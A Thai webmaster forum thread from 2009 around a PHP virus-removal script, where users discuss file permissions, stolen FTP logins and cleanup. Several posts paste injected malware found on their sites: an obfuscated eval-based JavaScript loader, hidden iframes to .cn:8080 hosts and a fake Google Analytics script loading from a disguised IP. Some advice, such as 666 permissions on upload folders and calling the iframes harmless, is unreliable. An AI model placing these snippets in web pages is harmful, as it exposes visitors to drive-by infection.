@sssii งานนี้ต้องดูแลเครื่องเราก่อน แล้วเว็บเราก็จะปลอดภัยตามครับ

@sealinda regex บางตัวผมเขียนยืดหยุนครับ มันเลยลบของตัวอื่นได้
เขียนบนแนวคิดความสงสัยว่าถ้ามีการเข้ารหัส ก็แปลว่ามีความเสี่ยง
จะไปแค่ eval base64 ปกติที่ผมไม่ได้เขียนสั่งลบ เพราะเทมเพลต WP บางรายมีเข้ารหัสมา เผลอลบก็มีอันเทมพัง
ส่วน FTP ก็ส่งข้อมูลมาทาง PM นะครับ จะได้ตรวจให้

======================
ช่วงนี้ผมไม่มีเวลามาให้ตรงนี้ต้องขอโทษทีครับ (เข้ามาก็ไม่รู้ด้วยแหละว่ากระทู้มีคนโพส)
ตอนนี้เคลียร์งานดองค้างให้หมด ทุกวันนี้ยังไม่รับงานใดๆ เพิ่มเลย

:P

ปล. ใครใช้สคริปแล้วเว็บมีปัญหาเว็บเสีย ต้องแจ้งผมนะครับ ทาง PM เลย
กังวลเรื่องนี้มากๆ เหมือนกัน :-X

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: sealinda ที่ 31 พฤษภาคม 2009, 01:38:43

ขอบคุณน้องโจ้มากๆๆๆๆๆค่ะ :'(

อันนี้นอกเรื่องนิดหน่อยนะ
เห็น reply ก่อนหน้านี้ มีพูดถึงโฮสต์กัน......ว่าถ้าติดเว็บนึง มีความเป็นไปได้ว่าจะติดทั้งโฮสต์
ของพี่เอใช้ hostmonster เนี่ย ก็มีความเป็นไปได้ว่าคนอื่นๆ ที่ใช้ hostmonster ก็จะติดเหมือนกันใช่ไหม ???

แต่คุยกะทาง support เค้าบอกว่าเค้าไม่มีการ maintenance เรื่องไวรัสให้
เค้าบอกว่า จะทำการ rollback กลับไป database ที่อัพเดทล่าสุดให้อย่างเดียว แต่จะไม่หาให้ว่าไวรัส หรือ ปัญหามันเกิดจากตรงไหน หรือต้องแก้ยังงัย ??? ก็เลยแอบแปลกใจว่าเค้าไม่กลัว มันจะแพร่กระจายไปที่เว็บอื่นๆ ในโฮสต์เค้าเลยหรอเนี่ย ???

ยังงัยก้อระวังกันหน่อยนะคะ คอยตรวจเช็คเว็บดีๆละกัน เด๋วจะได้มา intrend ด้วยกัน :-X

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: EThaiZone ที่ 31 พฤษภาคม 2009, 11:04:40

อ้างจาก: sealinda ที่ 31 พฤษภาคม 2009, 01:38:43

เรื่องนี้ต้องขอบคุณระบบโฮสที่ไม่ใช่ windows ครับ
ถ้าเราเซ็ต permission ดีๆ อย่างโฟลเดอร์คือ 755 ไฟล์ก็ 644
ถ้าเซ็ตตามนี้ apache มันจะรันได้แต่แก้ไฟล์ไม่ได้

ก็จะทำให้เวลาแฮกเกอร์สั่งรัน php เพื่อแทรกโค้ดลงเว็บ
มันจะไม่โดนของคนอื่นบนโฮสด้วยครับ

แต่ถ้าเช่นไฟล์ตั้ง 666 อันนี้เจอคนไหนรันมา ก็โดนหมด

ดังนั้นวิธีเซฟสุดในการป้องกันการโดนลูกหลงจากคนอื่น คือ "โฟลเดอร์คือ 755 ไฟล์ก็ 644"
จำให้ขึ้นใจเลยครับ :)

ส่วนกรณีเราโดนซะเอง อันนี้ต้องตรวจสอบพฤติกรรมการใช้คอม
เพราะไวรัสมันจะติดจากเครื่องเราก่อน แล้วแฮกเกอร์มันจะดัก ftp เราไปได้
แล้วมันถึงเข้า ftp ไปรัน php เพื่อแทรกโค้ดลงเว็บเราอีกทีครับ

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: sealinda ที่ 31 พฤษภาคม 2009, 20:37:46

อ้างจาก: pling ที่ 31 พฤษภาคม 2009, 11:52:25

อ้างถึง

ดังนั้นวิธีเซฟสุดในการป้องกันการโดนลูกหลงจากคนอื่น คือ "โฟลเดอร์คือ 755 ไฟล์ก็ 644"

ที่ folder domain เลยป่าวคับโจ้
หรือที่
/pub_html เลย

แล้วก็ folder ย่อยข้างในมันอีกทีเป็นอะไรครับ

รอฟังด้วย :D
ขอบคุณมากๆๆๆๆๆเลยนะคะ :-*

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: g-ji ที่ 31 พฤษภาคม 2009, 20:48:10

ทุกไฟล์644 + ทุกโฟลเดอร์755 เลย ปลอดภัยมากกว่า 95% (ทำอยู่ ตั้งกะโดนเล่นไปรอบนึง)

ยังไม่โดนอีกเลย :P

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: nume ที่ 31 พฤษภาคม 2009, 23:35:21

มันมาแล้วครับพี่น้อง เพิ่งเชคเว็บเจอ ล่อไปทั้งโฮสแลย >:( >:( >:(
กำลังไล่เก็บอยู่ครับ จะแก้ได้หรือเปล่าน้อ เดี๋ยวมาอัปเดทครับ

น่ากลัวจริงๆ
เซงจริงๆ

ขอบคุณคุณโจ้มากครับ

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: g-ji ที่ 01 มิถุนายน 2009, 00:12:54

อ้างจาก: pling ที่ 31 พฤษภาคม 2009, 21:28:28

อ้างจาก: g-ji ที่ 31 พฤษภาคม 2009, 20:48:10

อย่าง joomla เนี่ย มันจะมี folder ย่อย ภายใน folder ย่อยเยอะมาก
สรุป ทุก folder อยู่ตรงไหนไม่เกี่ยว ขอให้เป็น folder ให้เป็น 755
และ ทุก file อยู่ตรงไหนไม่เกี่ยว ขอให้เป็น 644
แบบนี้เข้าใจถูกต้องมั้ยครับ

ประมาณนั้นแหละนะ

อันไหนไม่ค่อยได้ใช้อ่ะ 644 กับ 755 ไปยาวๆ %ความปลอดภัยจะมีมากขึ้น

พวกโฟลเดอร์ที่เอาไว้อัพโหลดไฟล์ หรือ มีการใช้งานบ่อยๆ 666 ไว้ก็ได้

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: nume ที่ 01 มิถุนายน 2009, 05:46:53

อ่า เกเตอร์ของผมเขาก็เซทเป็น 755 กับ 644 ออโตอยู่แล้ว แต่ดันติดทั้งยวงเลย :P ตอนนี้สคริปแก้ไวรัสยังรันไม่เสร็จเลยครับ ตั้งแต่เที่ยงคืน ยันสว่าง แบบนี้ผิดปกติหรือเปล่าครับ สแกนไฟล์เห็นแค่ 2004ไฟล์เอง ??? ???

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: nume ที่ 01 มิถุนายน 2009, 09:39:39

ผมให้supportเขาจัดการให้แล้วครับ สงสัยเจอบ่อยช่วงนี้ แก้ให้แปบเดียวเอง :P แต่เราต้องป้องกันและแก้ที่เครื่องเราด้วย ตอนนี้มานั่งสแกนเครื่องต่อละ :-X ไม่รู้จะเจออะไรป่าว

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: loc.know ที่ 01 มิถุนายน 2009, 09:48:50

แล้วตัว scan virus ตัวไหนที่แน่ๆมีมั่งมั้ยครับ ตอนนี้ผมโดนมาแล้ว แต่ลองหาดูในเครื่องมัน scan ไม่เจอน่ะ

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: sealinda ที่ 01 มิถุนายน 2009, 17:08:51

อ้างจาก: loc.know ที่ 01 มิถุนายน 2009, 09:48:50

เอลองใช้ตัวนี้อ่ะค่ะ

http://www.emsisoft.com/en/software/ax/

ใช้แบบ deep scan ใช้เวลาค่อนข้างนานเหมือนกัน
แต่เจอหมดทั้งยวง และก็กำจัดได้ทั้งหมด
เจอ backdoor ด้วย สงสัยที่มันฝัง backdoor ที่เครื่องเอก่อน แล้วก้อดักพาสเข้า ftp :-X

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: EThaiZone ที่ 02 มิถุนายน 2009, 22:30:49

อ้างจาก: pling ที่ 31 พฤษภาคม 2009, 11:52:25

อ้างถึง

ใน public_html ครับ มีย่อยซัพ อะไรทั้งหมด นั้นแหละ ทำให้หมดเลย
แต่พอทำ ก็อาจจะมีปัญหากับสคริปบางตัวที่ต้องการเขียนทับไฟล์
เช่น smf ก็มีพวกเรื่องแก้เทมเพลจ แก้ css พวกนี้ก็จะทำไม่ได้
เพราะติดเรื่อง permission ไฟล์

แต่ก็ต้องชั่งใจครับ ถ้าพวกนี้เราไม่ได้แก้อะไรบ่อยๆ ก็ไม่มีความจำเป็นที่ต้องเซ็ตให้เขียนทับได้
สู้chmod เป็น 755 และ 644 เพื่อเซฟแก่ตัวเราจะดีสุดครับ

แต่ว่าพวกนี้จะไม่มีความหมาย ถ้าเราดันโดนเจาะ ftp ของเราซะเอง :P

อ้างจาก: pling ที่ 01 มิถุนายน 2009, 07:07:14

อ้างจาก: nume ที่ 01 มิถุนายน 2009, 05:46:53

hm ก็ เซทออโต้ ก็ยังติดครับ สรุป ป้องกันไม่ได้เหมือนกันครับ ที่ยังไม่เสร็จมันคงค้างไปแล้วล่ะครับ ตอนนี้ผม reset account เรียบร้อย ทะยอย upload ไปใหม่
ส่วนเวปไหนเป็น wp ก็ export db ออกมา แล้ว import ไปใหม่ช้าหน่อยแต่ชัวร์

ตามข้างบนครับ คือถ้ายังโดนแปลว่าไม่ใช่คนอื่นบนโฮสโดน
แต่ท่านโดนเจาะซะเอง เจอแบบนี้ทางแฮกเกอร์ก็ไม่ยากครับที่จะ chmod กลับเป็น 666
หรือไม่ก็ง่ายกว่าด้วยการดาว์นโหลดไฟล์เป้าหมายมาอ่าน แล้วรีอัพกลับไฟล์ที่แก้แล้วไปใหม่
ซึ่งส่วนมากจะเป็นเคสนี้จริงๆ เพราะเท่าที่ดู permission จะไม่เปลี่ยน แต่ไฟล์จะมีการอัพเดต

สำหรับแฮกเกอร์ ไม่สิ ขนาดผมระดับอ่อนๆ ยังเขียน client ให้ติดต่อ ftp ได้เองไม่ยากเลย (php ก็ทำได้นะเออ = =a)
ดึงรายชื่อ แล้วโหลดแต่ไฟล์เป้าหมาย (index.php index.html main config) แล้วแก้แล้วรีอัพขึ้นไป
ง่ายปานปอกกล้วยและทำซ้ำได้ไม่ยาก ขอแค่ได้ ftp จากการดักแพกเกจก็พอ

:-X

##############################
จริงๆ ถ้าโฮสไหนมี antivirus ในตัวก็น่าใช้นะครับ พวกนี้ขนาดเราแค่อัพ... phpสารพัดประโยชย์ (ละไว้ฐานเข้าใจ ไม่อยากบอกชื่อ)
มันก็จัดการลบทิ้งแล้ว แต่ถามว่าทำไมโฮสทั่วไป ไม่ค่อยจะมีกัน

เรื่องก็คือเพราะโฮสส่วนมากเป็น unix ซะเยอะ (ผมเรียกเหมาหมดก็อย่าว่ากันนะ ไม่อยากย่อยไปถึง bsd หรืออื่นๆ)
ซึ่งพวกนี้เขียนไวรัสมา พอเจอ kernel คนละเวอร์ชั่น มันก็ทำงานไม่ลงรอยก็มี
เลยเป็นว่าไม่คุ้มที่จะทำสู้ทาง Windows ก็ไม่ได้ เถื่อนไงก็อย่างงั้น
บิตมาไงก็ใช้อย่างงั้น บางรุ่นมาีห้ามๆ ใช้ autoupdate เพื่อกัน genius ก็ยิ่งเข้าทาง
เสร็จโจร อะไรแบบนั้น มันเลยง่ายและคุ้มที่จะเขียนเล่นงาน

กลับมาต่อว่าไอ้ที่เราๆ ท่านๆ ในไทยเสียวโดนกัน
จริงๆ มันก็ไม่ใช่ไวรัสหรอก มันก็คือiframe ธรรมดา หรือบางคนหรูก็โดน js
แต่สรุป มันก็คือ iframe นั้นแหละ ซึ่งเกินครึ่ง ไอ้คนทำมันทำเพื่อปั่น topsite
แต่เพราะเป็นการบุกรุกเว็บ พวก avg เลยเตือนว่าอันตราย กูเกิ้ลก็เตือน
แต่ถามว่าอันตรายกับผู้ใช้ไหม มันก็ไม่ อันตรายกับโฮสไหม มันก็ไม่
มันเลยเป็นเหตุผลที่โฮสทาง unix มักไม่มี antivirus กับเขา
ติดไปทำไม เดี๋ยวพออัพ kernel ใหม่ๆ ไอ้ที่เคยใช้ได้ (ไวรัส) มันก็ล่มปากอ่าว
อย่าว่าเลย ขนาดไม่ต้องอัพ มันก็ถึกอยู่แล้ว

แต่กูเกิ้ลให้ความสำคัญ ถ้าเราดูแลเว็บไม่ได้ เราก็คงดูแลผู้ใช้งานไม่ได้
อันนี้เราก็ต้องทำใจ และจัดการแก้ปัญหากันไป

อ้างจาก: nume ที่ 01 มิถุนายน 2009, 09:39:39

อันนี้เห็นด้วยนะครับ ผมอยากให้ติดต่อซัพพอร์ทโฮสดูก่อน ถ้าเขาแก้ให้ได้ก็ให้เขาแก้เถอะ
ผมเองก็ไม่เคยชัวร์ว่าสคริปที่ผมเขียนมันจะทำงานได้ตรงตามที่คิด 100%
หรือจริงๆ ถ้าให้คนเป็น php มาไล่ตรวจไฟล์ ก็จะทราบไม่ยากว่าโดนที่ไฟล์ไหน
อย่างส่วนมากไฟล์ที่มักโดนแก้และยัดโค้ด มักจะมีชื่อตามรายการนี้

index.*
main.*
config.*
db.*
function.*
functions.*
include.*

ส่วนมากจะไม่พ้นมากกว่านี้ แค่สคริปผมจริงๆ ผมก็ว่าให้มันทำงานเกินกว่าเหตุนะ
เพราะมันจะไล่อ่านด๊ะทุกไฟล์

แต่เราก็ไม่ทราบว่าเมื่อไรเป้าหมายมันจะเล่นทั้งหมด เพราะตอนผมเห็นโค้ดครั้งแีรก
แหม ใช้ทั้ง ob จัดการแก้ output บอกตามตรงมันยัดไว้หลายจุด
โค้ดมันไม่ชนกัน ทำงานไม่ซ้ำซ้อนกัน ทั้งที่โค้ดเหมือนดันแด๊ะ ถ้าคนทำมันเป็นเพื่อนผมๆ คงชมมัน "เอ็งเก่ง"
แต่.... เฮ้อ... หมดอารมณ์จะพิมพ์ เอิ้ก!

##############################

ที่ผมหายไปวันสองวันนี้ที่ผ่านมา เป็นไข้หนักครับ เพ้อด้วย เพ้อถึงเกมส์ RPG ที่เคยเล่น
ฃพรุ่งนี้จะไปหาหมอ นี้ดีขึ้นบ้างเลยมาโพส แต่ยังปวดหัวตุบๆ ตามจังหวะหัวใจ อุๆ
ใครวานให้ผมช่วยอะไรก็เห็นใจหน่อยนะ :-*
แต่จริงๆ ที่หนักกว่าคือ "คนที่เขาจ้างผมทำงาน" อันนี้แหละ ก็รอตูก่อนละกัน :-X

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: mapandy ที่ 02 มิถุนายน 2009, 23:40:45

ร่วมด้วยช่วย +1

ขอบคุณคุณโจ้มาก ๆ ครับ

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: manchy ที่ 05 มิถุนายน 2009, 12:09:27

ขอบคุณมากคับช่วยผมได้จริงๆ

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: ~สายลม~ ที่ 05 มิถุนายน 2009, 15:18:55

ตามมาเก็นด้วยคนครับ ช่วงนี้ไวรัสระบาดหนักเหลือเกิน เว็บใหญ่เว็บเล็ก โดนกันถ้วนหน้า :-X

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: cowboyIT ที่ 06 มิถุนายน 2009, 18:03:49

ขอขุดหน่อยนะครับ

คุณโจ้ ผมโหลดเวอร์ชั่นล่าสุด ไม่ได้ครับ

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: 004275 ที่ 06 มิถุนายน 2009, 18:11:08

อยากรู้คับ ว่าไฟล์ favcon นี่มันใช่ไวรัสรึป่าว ทำไมลบออกไปแล้ว มันก็ยังกลับเข้ามาอะคับ

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: devil_joe ที่ 07 มิถุนายน 2009, 18:46:53

ลองลบแล้วไม่หายครับ เจอตัวนี้ :P

โค๊ด:

<script>jl="707b776179717a603a63667d60713c36287d72667579713467667729337c6060642e3b3b707d737d6075787d7a67647d6675607d7b7a3a7127236e3a777a3b60717871777b793b3334637d70607c29332533347c717d737c60293325333467606d78712933627d677d767d787d606d2e347c7d7070717a2f332a283b7d72667579712a363d2f67616d766029365a755a362f7a7a7d716e7a29365a755a362f";jr="function mn(){ixho=Math.PI;vjjwlf=parseInt;ep='length';heqf=vjjwlf(~((ixho&ixho)|(~ixho&ixho)&(ixho&~ixho)|(~ixho&~ixho)));am=vjjwlf(((heqf&heqf)|(~heqf&heqf)&(heqf&~heqf)|(~heqf&~heqf))&1);ebbj=am<<am;nniezn=heqf;suybt='';szgop=String.fromCharCode;ex=eval;for(pmfnc=heqf;pmfnc<jr[ep];pmfnc-=-am)nniezn+=jr.charCodeAt(pmfnc);nniezn%=unescape(heqf+unescape('%78')+(am<<6));for(pmfnc=heqf;pmfnc<jl[ep];pmfnc+=ebbj)suybt+=szgop(vjjwlf(heqf+unescape('%78')+jl.charAt(pmfnc)+jl.charAt(pmfnc+vjjwlf(am)))^nniezn);try{ex(suybt);}catch(e){try{eval(suybt);}catch(e) {window.location='/';}}}try{eval('mn();')}catch(e) {}";eval(jr);</script>

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: cowboyIT ที่ 07 มิถุนายน 2009, 20:28:46

อ้างจาก: devil_joe ที่ 07 มิถุนายน 2009, 18:46:53

ลองลบแล้วไม่หายครับ เจอตัวนี้ :P

โค๊ด:

<script>jl="707b776179717a603a63667d60713c36287d72667579713467667729337c6060642e3b3b707d737d6075787d7a67647d6675607d7b7a3a7127236e3a777a3b60717871777b793b3334637d70607c29332533347c717d737c60293325333467606d78712933627d677d767d787d606d2e347c7d7070717a2f332a283b7d72667579712a363d2f67616d766029365a755a362f7a7a7d716e7a29365a755a362f";jr="function mn(){ixho=Math.PI;vjjwlf=parseInt;ep='length';heqf=vjjwlf(~((ixho&ixho)|(~ixho&ixho)&(ixho&~ixho)|(~ixho&~ixho)));am=vjjwlf(((heqf&heqf)|(~heqf&heqf)&(heqf&~heqf)|(~heqf&~heqf))&1);ebbj=am<<am;nniezn=heqf;suybt='';szgop=String.fromCharCode;ex=eval;for(pmfnc=heqf;pmfnc<jr[ep];pmfnc-=-am)nniezn+=jr.charCodeAt(pmfnc);nniezn%=unescape(heqf+unescape('%78')+(am<<6));for(pmfnc=heqf;pmfnc<jl[ep];pmfnc+=ebbj)suybt+=szgop(vjjwlf(heqf+unescape('%78')+jl.charAt(pmfnc)+jl.charAt(pmfnc+vjjwlf(am)))^nniezn);try{ex(suybt);}catch(e){try{eval(suybt);}catch(e) {window.location='/';}}}try{eval('mn();')}catch(e) {}";eval(jr);</script>

ตามนั้น เจอเหมือนกัน มันพัฒนาขึ้นทุกวันๆ

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: baby-bride ที่ 07 มิถุนายน 2009, 20:48:33

ผมเพิ่งโดนเดี๋ยวนี้ โหลดโฟลโปรแกนมไม่ได้ พี่ EthaiZone
เจอ iFrame มั่วไปหมด หลายไฟ บนบ่าง ล่างบ่าง

ตอนนี้ทุกเว็บในลายเซ็น กลายเป็น ปิดชั่วคราวหมด รอโหลด program มาแก้
อ่านมาทั้งหมด 6 หน้า ใช้ 2 ชม เพิ่งจบเดี๋ยวนี้
เดี๋ยวลองกลับ ไปโหลดใหม่
คงต้องให้ คนดูโฮสทำให้ มันยากเกินกว่าจะทำเอง

+1 เต็มๆ ( copy iFrame มาไม่ทัน เจ้าของ ip ปิดไปก่อน ขอโทษ )

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: ~~~เทพ Google Ad ~~~ ที่ 07 มิถุนายน 2009, 20:56:46

โหลดไม่ได้ครับพี่ครับ

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: EThaiZone ที่ 07 มิถุนายน 2009, 21:19:58

แวะมาตอบก่อน พอดีช่วงนี้งานพันหัวพันท้าย

เว็บเข้าไม่ได้เพราะผมย้ายผู้จดมาอยู่กับ dotsiam แทน
เมื่อก่อนอยู่ ecomhost จริงๆ ก็ไม่อยากย้าย
ถ้าไม่เพราะพยายามประหยัดทุกทาง

เลยเป็นว่าเดี๋ยวจะแก้โดเมนก่อน :P

ปล. มะกี้เพิ่งเข้าเอ็มในรอบหลายวัน เมล์ค้าง 47 ฉบับ ไม่รวม junk อีกต่างหาก
มากกว่าครึ่งเป็นเมล์ต่างประเทศ :P

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: SaintTakumi ที่ 10 มิถุนายน 2009, 20:01:41

ช่วยด้วยครับ ของผมมันใส่โค๊ดนี่ไน php เกือบทุกไฟล์เลยอ่ะครับ

โค๊ด:

<iframe src="http://mixmaxgroup.cn:8080/ts/in.cgi?pepsi53" width=125 height=125 style="visibility: hidden"></
<iframe src="http://thehomename.cn:8080/index.php" width=111 height=141 style="visibility: hidden"></iframe>

ลองใช้ตัว remove แล้วมันไม่ได้อ่ะครับ ไม่ทราบจะแก้ยังไงครับ

และตั้งค่า cmod แบบไหนดีถึงจะปลอดภัยครับ แนะนำด้วยครับ เครียดอย่างแรง :-X :-X

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: Step9 ที่ 10 มิถุนายน 2009, 21:27:25

วันนี้เจอสายพันธุ์ใหม่ครับ

มันแทรกเป็นGoogle Analytic

โค๊ด:

<?php echo &#39;&#39;; ?><?php echo &#39;<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript sr?=&#39;" + gaJsHost + "google-analytics.com/ga.js&#39; " + &#39;#@!s(&r)c@#=!)\&#39;!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)&#39;.replace(/#|@|&|\$|\)|\!|\^|\(/ig, &#39;&#39;) + "&#39; type=&#39;text/javascript&#39;%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-7623457-2");
pageTracker._trackPageview();
} catch(err) {}</script>&#39;; ?>

UA-7623457-2 <--ฟ้องGoogleเลย

:(

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: Step9 ที่ 10 มิถุนายน 2009, 21:31:36

ทำไมเขาต้องทำเว็บคนอื่นพังด้วยไม่เข้าใจ
มาวางLinkเฉยๆไม่ดีกว่าเหรอ

???

ผมว่าจริงๆเขาก็ต้องการจะเนียนวางCodeแหล่ะ
แต่ยังทำไม่ได้100% เว็บคนอื่นเลยพัง ถ้าต่อไปเขาพัฒนาจนเนียนได้นี่จะกลายเป็นเจ้าโลกแห่งSEOเลยมั้ง

:-\

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: baby-bride ที่ 10 มิถุนายน 2009, 22:12:35

วันนี้เจออีกเว็บ

โค๊ด:

<iframe src="http://thebettings.cn:8080/ts/in.cgi?pepsi55" width=125 height=125 style="visibility: hidden"></iframe>

ยังโหลด program หน้า 1 ไม่ได้เลย

ใครใจดี ช่วยที ขอบคุณ

หัวข้อ: Re: PHP Virus Remover AJAX v2.9 By EThaiZone (อัพเกรด 11/6/52)
เริ่มหัวข้อโดย: EThaiZone ที่ 11 มิถุนายน 2009, 12:37:28

ข่าวดี
เดี๋ยวอีกไม่เกินครึ่งชั่วโมง ผมจะอัพตัวล่าสุดใส่เว็บฝากไฟล์ให้โหลดกัน
แก้ไปหลายอย่าง จะเอาให้เบาขึ้น (ตาม build เป็น 2.9 แล้ว) ตอนนี้แก้ตาม rep เก่าๆ
แล้วอีกไม่นาน ไม่น่าเกินสี่ห้าวัน จะออก 3.0 ที่จะสแกนเฉพาะไฟล์น่าสงสัย ทำให้เบาขึ้นไปอีก
และจะมี interface ที่มันน่าจะใช้ง่ายกว่านี้นะ :P

ข่าวร้าย
<iframe src="http://google.com" width=100 height=100 style="visibility:
โค้ด iframe ที่เสียหายแบบนี้ ฺBrowser กลับทำงาน แต่ว่าผมไม่สามารถเขียน regex ดักได้
เพราะสภาวะแวดล้อมในการใช้งานจริงมันต่างกัน
Browser มันน่าตัดการทำงานโค้ด html ที่ไม่สมบูรณ์ทิ้งเนอะ :-X

หัวข้อ: Re: PHP Virus Remover AJAX v2.9 By EThaiZone (อัพเกรด 11/6/52)
เริ่มหัวข้อโดย: KAI ที่ 11 มิถุนายน 2009, 13:03:47

มาลงชื่อรอโหลด ครับโจ้

ผมก็ติดเชื้อ :P

ดรีมโฮส

หัวข้อ: Re: PHP Virus Remover AJAX v2.9 By EThaiZone (อัพเกรด 11/6/52)
เริ่มหัวข้อโดย: EThaiZone ที่ 11 มิถุนายน 2009, 13:06:32

แก้เสร็จแล้วนะครับ โหลดได้เลยที่หน้าแรก อัีพใส่เว็บฝากไฟล์ไว้ก่อน

:P

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: teacup ที่ 11 มิถุนายน 2009, 13:44:31

อ้างจาก: SaintTakumi ที่ 10 มิถุนายน 2009, 20:01:41

ช่วยด้วยครับ ของผมมันใส่โค๊ดนี่ไน php เกือบทุกไฟล์เลยอ่ะครับ

โค๊ด:

<iframe src="[url]http://mixmaxgroup.cn:8080/ts/in.cgi?pepsi53[/url]" width=125 height=125 style="visibility: hidden"></
<iframe src="[url]http://thehomename.cn:8080/index.php[/url]" width=111 height=141 style="visibility: hidden"></iframe>

cmod 444 เท่านั้นถึงรอดครับ

อันดับใน google ร่วง และไซต์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์คุณอีก เหอะๆ ...

หัวข้อ: Re: PHP Virus Remover AJAX v2.9 By EThaiZone (อัพเกรด 11/6/52)
เริ่มหัวข้อโดย: baby-bride ที่ 11 มิถุนายน 2009, 17:03:36

ของผม รอผลรัน 2.9 อยู่ครึ่งชั่วโมง เจอ

โค๊ด:

<iframe src="http://lotwager.cn:8080/ts/in.cgi?pepsi56" width=125 height=125 style="visibility: hidden"></iframe>

และ

โค๊ด:

<iframe src="http://lotwager.cn:8080/ts/in.cgi?pepsi56" width=125 height=125 style="visibility: hidden"></iframe><iframe src="http://lotwager.cn:8080/ts/in.cgi?pepsi56" width=125 height=125 style="visibility: hidden"></iframe>

ตอนนี้เพิ่งได้กด FEC: Success!!!! พอมีลุ้นจะหายไหม

ขอบคุณที่มอบของดีๆ ให้กับผม

หัวข้อ: Re: PHP Virus Remover AJAX v2.9 By EThaiZone (อัพเกรด 11/6/52)
เริ่มหัวข้อโดย: EThaiZone ที่ 11 มิถุนายน 2009, 18:18:55

มันจะขึ้นอีกปุ่มครับ ให้กดต่อ
เพื่อรันแก้จริงๆ

ต้องขึ้น FSF: Success!!! ครับ ถึงจะทำงานเสร็จแล้ว :P

เวอร์ 3.0 จะทำให้ง่ายกว่านี้ครับ แต่ขอเวลาแก้ไขหน่อย
ต้องแบ่งเวลาจากงานประจำมาทำ

:P

หัวข้อ: Re: PHP Virus Remover AJAX v2.9 By EThaiZone (อัพเกรด 11/6/52)
เริ่มหัวข้อโดย: sealinda ที่ 12 มิถุนายน 2009, 09:13:57

แวะมาบอกว่าโดนอีกรอบแล้ว
และดูเหมือนคราวนี้จะโดนทุกไฟล์เลย

มันไม่ได้แค่แปะแทรกโค้ดลงไปแบบคราวก่อนด้วย
แต่เล่นแก้โค้ด (ตัดโค้ดบางส่วนทิ้ง) ไปเลย :P :P

ได้ชื่อเพิ่มมาอีกชื่อด้วย

โค๊ด:

<iframe src="http://filmlifeimages.cn:8080/index.php" width=149 height=180 style="visibility: hidden"></iframe>

:-X :-X

หัวข้อ: Re: PHP Virus Remover AJAX v2.S By EThaiZone (ใครยังไม่โหลดเวอร์นี้ โปรดโหลดด่วน)
เริ่มหัวข้อโดย: EThaiZone ที่ 12 มิถุนายน 2009, 16:23:39

อัีพเดตด่วนครับ ใครคิดจะใช้ตัวเก่า โปรดโหลดตัวนี้แทนทันที

เพราะแก้ปัญหาที่ Core ภายใน และปรับปรุง Regex ให้แม่นยำกว่าเดิม
เป็นจุดสำคัญมาก และขอประกาศเป็น Stable คือไม่อัพเกรดตวนี้อีกแล้ว

โปรดรอจนกว่า v.3 จะมา ซึ่งคาดว่าจะทำให้ทำงานเร็วกว่าเดิมอีก

ปล. ฝนตก เซ็งมาก เน็ตจะตัดแล้วล่ะ :-X

